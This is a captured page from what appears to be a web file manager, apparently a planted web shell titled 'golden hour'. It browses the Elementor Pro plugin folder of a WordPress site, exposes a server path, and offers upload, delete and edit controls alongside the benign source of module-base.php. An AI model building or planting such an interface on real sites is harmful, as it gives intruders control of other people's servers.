golden hour
/home/godaofbq/dev.hyperredbed.com/wp-content/plugins/elementor-pro/base
⬆️ Go Up
Upload
File/Folder
Size
Actions
base-carousel-trait.php
37.74 KB
Del
OK
base-widget-trait.php
329 B
Del
OK
base-widget.php
663 B
Del
OK
module-base.php
332 B
Del
OK
on-import-trait.php
3.9 KB
Del
OK
Edit: module-base.php
<?php namespace ElementorPro\Base; use Elementor\Core\Base\Module; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly } abstract class Module_Base extends Module { // This class was needed in the past and not being removed for future functionalities that might be needed for all classes that still extend it. }
Save